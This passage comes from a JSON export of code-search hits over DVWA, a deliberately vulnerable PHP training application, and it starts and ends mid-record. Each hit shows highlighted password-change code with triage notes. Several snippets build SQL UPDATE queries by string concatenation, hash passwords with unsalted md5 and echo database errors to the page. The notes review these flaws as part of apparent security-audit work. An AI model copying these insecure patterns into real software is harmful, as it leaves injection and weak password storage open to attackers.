punctuation\">.</span> <span class=\"token function\">dvwaCurrentUser</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> \"' LIMIT <span class=\"token number\">1</span><span class=\"token comment\" 
spellcheck=\"true\">;\";</span>\n<span class=\"line-number\">32:</span> \t\t\t<span class=\"token variable\">$result</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_query</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$insert</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">or</span> <span class=\"token function\">die</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'&lt;pre>'</span> <span class=\"token punctuation\">.</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_error</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$___mysqli_res</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_connect_error</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span 
class=\"token operator\">?</span> <span class=\"token variable\">$___mysqli_res</span> <span class=\"token punctuation\">:</span> <span class=\"token boolean\">false</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'&lt;/pre>'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">33:</span> \n<span class=\"line-number\">34:</span> \t\t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Feedback <span class=\"token keyword\">for</span> user\n<span class=\"line-number\">35:</span> \t\t\t<span class=\"token variable\">$html</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"&lt;pre>Password Changed.&lt;/pre>\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 30,
  "start": 25,
  "end": 36,
  "severity": "unknown",
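  "note": "Triage: the match is the comment on line 30; review line 31 instead. The UPDATE is assembled by string concatenation: $pass_new is an md5() hex digest by then (line 28), while the dvwaCurrentUser() return value is concatenated as-is. Its origin is not shown in this excerpt, so confirm it cannot carry attacker-controlled text, or use a prepared statement with bound parameters. Also note that md5() without a salt is not a suitable password hash, and that line 32 prints the mysqli_error() text to the page when the query fails."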
 },
 {
  "id": 114,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/impossible.php",
  "filetype": "php",
  "search": "\\supdate",
  "match": "<span class=\"line-number\">43:</span> \t\t<span class=\"token variable\">$data</span><span class=\"token operator\">-</span><span class=\"token operator\">></span><span class=\"token function\">bindParam</span><span class=\"token punctuation\">(</span> <span class=\"token string\">':password'</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$pass_curr</span><span class=\"token punctuation\">,</span> PDO<span class=\"token punctuation\">:</span><span class=\"token punctuation\">:</span>PARAM_STR <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">44:</span> \t\t<span class=\"token variable\">$data</span><span class=\"token operator\">-</span><span class=\"token operator\">></span><span class=\"token function\">execute</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">45:</span> \n<span class=\"line-number\">46:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> <span class=\"token keyword\">Do</span> both new password match <span class=\"token operator\">and</span> was the current password correct<span class=\"token operator\">?</span>\n<span class=\"line-number\">47:</span> \t\t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token operator\">==</span> <span class=\"token variable\">$pass_conf</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token punctuation\">(</span> <span class=\"token variable\">$data</span><span class=\"token operator\">-</span><span class=\"token operator\">></span><span class=\"token function\">rowCount</span><span 
class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> <span class=\"token number\">1</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"highlight\"><span class=\"line-number\">48:</span> \t\t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Update the database</span>\n<span class=\"line-number\">49:</span> \t\t\t<span class=\"token variable\">$data</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$db</span><span class=\"token operator\">-</span><span class=\"token operator\">></span><span class=\"token function\">prepare</span><span class=\"token punctuation\">(</span> 'UPDATE users SET password <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">:</span>password<span class=\"token punctuation\">)</span> WHERE user <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">:</span>user<span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;' );</span>\n<span class=\"line-number\">50:</span> \t\t\t<span class=\"token variable\">$data</span><span class=\"token operator\">-</span><span class=\"token operator\">></span><span class=\"token function\">bindParam</span><span class=\"token punctuation\">(</span> <span class=\"token string\">':password'</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$pass_new</span><span class=\"token punctuation\">,</span> PDO<span class=\"token punctuation\">:</span><span class=\"token punctuation\">:</span>PARAM_STR <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">51:</span> \t\t\t<span class=\"token variable\">$data</span><span class=\"token operator\">-</span><span class=\"token 
operator\">></span><span class=\"token function\">bindParam</span><span class=\"token punctuation\">(</span> <span class=\"token string\">':user'</span><span class=\"token punctuation\">,</span> <span class=\"token function\">dvwaCurrentUser</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> PDO<span class=\"token punctuation\">:</span><span class=\"token punctuation\">:</span>PARAM_STR <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">52:</span> \t\t\t<span class=\"token variable\">$data</span><span class=\"token operator\">-</span><span class=\"token operator\">></span><span class=\"token function\">execute</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">53:</span> ",
  "line": 48,
  "start": 43,
  "end": 54,
  "severity": "unknown",
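  "note": "Triage: the match is the comment on line 48, not SQL. The UPDATE on line 49 is a prepared statement with :password and :user bound on lines 50-51, so no query text is built from input in this excerpt. Minor: line 51 passes the dvwaCurrentUser() result to bindParam, which binds by reference; bindValue is the fitting call for a function result."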
 },
 {
  "id": 126,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/low.php",
  "filetype": "php",
  "search": "\\supdate",
  "match": "<span class=\"line-number\">54:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token operator\">==</span> <span class=\"token variable\">$pass_conf</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">55:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> They <span class=\"token keyword\">do</span>!\n<span class=\"line-number\">56:</span> \t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token 
punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">57:</span> \t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">58:</span> \n<span class=\"highlight\"><span class=\"line-number\">59:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Update database</span>\n<span class=\"line-number\">60:</span> \t\t<span class=\"token variable\">$insert</span> <span class=\"token operator\">=</span> <span class=\"token string\">\"UPDATE `users` SET password = '$pass_new' WHERE user = '\"</span> <span class=\"token punctuation\">.</span> <span class=\"token function\">dvwaCurrentUser</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> \"'<span class=\"token comment\" spellcheck=\"true\">;\";</span>\n<span class=\"line-number\">61:</span> \t\t<span class=\"token variable\">$result</span> <span class=\"token operator\">=</span> <span class=\"token 
function\">mysqli_query</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$insert</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">or</span> <span class=\"token function\">die</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'&lt;pre>'</span> <span class=\"token punctuation\">.</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_error</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$___mysqli_res</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_connect_error</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token variable\">$___mysqli_res</span> <span class=\"token punctuation\">:</span> <span class=\"token boolean\">false</span><span 
class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'&lt;/pre>'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">62:</span> \n<span class=\"line-number\">63:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Feedback <span class=\"token keyword\">for</span> the end user\n<span class=\"line-number\">64:</span> \t\t<span class=\"token variable\">$html</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"&lt;pre>Password Changed.&lt;/pre>\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 59,
  "start": 54,
  "end": 65,
  "severity": "unknown",
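  "note": "Triage: the match is the comment on line 59; review line 60 instead. The UPDATE is assembled by string concatenation: $pass_new is an md5() hex digest by then (line 57), while the dvwaCurrentUser() return value is concatenated as-is. Its origin is not shown in this excerpt, so confirm it cannot carry attacker-controlled text, or use a prepared statement with bound parameters. Also note that md5() without a salt is not a suitable password hash, and that line 61 prints the mysqli_error() text to the page when the query fails."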
 },
 {
  "id": 138,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/medium.php",
  "filetype": "php",
  "search": "\\supdate",
  "match": "<span class=\"line-number\">62:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token operator\">==</span> <span class=\"token variable\">$pass_conf</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">63:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> They <span class=\"token keyword\">do</span>!\n<span class=\"line-number\">64:</span> \t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token 
punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">65:</span> \t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">66:</span> \n<span class=\"highlight\"><span class=\"line-number\">67:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Update database</span>\n<span class=\"line-number\">68:</span> \t\t<span class=\"token variable\">$insert</span> <span class=\"token operator\">=</span> <span class=\"token string\">\"UPDATE `users` SET password = '$pass_new' WHERE user = '\"</span> <span class=\"token punctuation\">.</span> <span class=\"token function\">dvwaCurrentUser</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> \"'<span class=\"token comment\" spellcheck=\"true\">;\";</span>\n<span class=\"line-number\">69:</span> \t\t<span class=\"token variable\">$result</span> <span class=\"token operator\">=</span> <span class=\"token 
function\">mysqli_query</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$insert</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">or</span> <span class=\"token function\">die</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'&lt;pre>'</span> <span class=\"token punctuation\">.</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_error</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$___mysqli_res</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_connect_error</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token variable\">$___mysqli_res</span> <span class=\"token punctuation\">:</span> <span class=\"token boolean\">false</span><span 
class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'&lt;/pre>'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">70:</span> \n<span class=\"line-number\">71:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Feedback <span class=\"token keyword\">for</span> the end user\n<span class=\"line-number\">72:</span> \t\t<span class=\"token variable\">$html</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"&lt;pre>Password Changed.&lt;/pre>\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 67,
  "start": 62,
  "end": 73,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 149,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/csrf/source/high.php",
  "filetype": "php",
  "search": "\\supdate",
  "match": "<span class=\"line-number\">12:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token operator\">==</span> <span class=\"token variable\">$pass_conf</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">13:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> They <span class=\"token keyword\">do</span>!\n<span class=\"line-number\">14:</span> \t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token 
punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">15:</span> \t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">16:</span> \n<span class=\"highlight\"><span class=\"line-number\">17:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Update the database</span>\n<span class=\"line-number\">18:</span> \t\t<span class=\"token variable\">$insert</span> <span class=\"token operator\">=</span> <span class=\"token string\">\"UPDATE `users` SET password = '$pass_new' WHERE user = '\"</span> <span class=\"token punctuation\">.</span> <span class=\"token function\">dvwaCurrentUser</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> \"'<span class=\"token comment\" spellcheck=\"true\">;\";</span>\n<span class=\"line-number\">19:</span> \t\t<span class=\"token variable\">$result</span> <span class=\"token operator\">=</span> <span class=\"token 
function\">mysqli_query</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$insert</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">or</span> <span class=\"token function\">die</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'&lt;pre>'</span> <span class=\"token punctuation\">.</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_error</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$___mysqli_res</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_connect_error</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token variable\">$___mysqli_res</span> <span class=\"token punctuation\">:</span> <span class=\"token boolean\">false</span><span 
class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'&lt;/pre>'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">20:</span> \n<span class=\"line-number\">21:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Feedback <span class=\"token keyword\">for</span> the user\n<span class=\"line-number\">22:</span> \t\t<span class=\"token variable\">$html</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"&lt;pre>Password Changed.&lt;/pre>\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 17,
  "start": 12,
  "end": 23,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 158,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/csrf/source/impossible.php",
  "filetype": "php",
  "search": "\\supdate",
  "match": "<span class=\"line-number\">25:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> It does!\n<span class=\"line-number\">26:</span> \t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">27:</span> \t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> 
<span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">28:</span> \t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">29:</span> \n<span class=\"highlight\"><span class=\"line-number\">30:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Update database <span class=\"token keyword\">with</span> new password</span>\n<span class=\"line-number\">31:</span> \t\t<span class=\"token variable\">$data</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$db</span><span class=\"token operator\">-</span><span class=\"token operator\">></span><span class=\"token function\">prepare</span><span class=\"token punctuation\">(</span> 'UPDATE users SET password <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">:</span>password<span class=\"token punctuation\">)</span> WHERE user <span class=\"token operator\">=</span> <span class=\"token 
punctuation\">(</span><span class=\"token punctuation\">:</span>user<span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;' );</span>\n<span class=\"line-number\">32:</span> \t\t<span class=\"token variable\">$data</span><span class=\"token operator\">-</span><span class=\"token operator\">></span><span class=\"token function\">bindParam</span><span class=\"token punctuation\">(</span> <span class=\"token string\">':password'</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$pass_new</span><span class=\"token punctuation\">,</span> PDO<span class=\"token punctuation\">:</span><span class=\"token punctuation\">:</span>PARAM_STR <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">33:</span> \t\t<span class=\"token variable\">$data</span><span class=\"token operator\">-</span><span class=\"token operator\">></span><span class=\"token function\">bindParam</span><span class=\"token punctuation\">(</span> <span class=\"token string\">':user'</span><span class=\"token punctuation\">,</span> <span class=\"token function\">dvwaCurrentUser</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> PDO<span class=\"token punctuation\">:</span><span class=\"token punctuation\">:</span>PARAM_STR <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">34:</span> \t\t<span class=\"token variable\">$data</span><span class=\"token operator\">-</span><span class=\"token operator\">></span><span class=\"token function\">execute</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">35:</span> ",
  "line": 30,
  "start": 25,
  "end": 36,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 164,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/csrf/source/low.php",
  "filetype": "php",
  "search": "\\supdate",
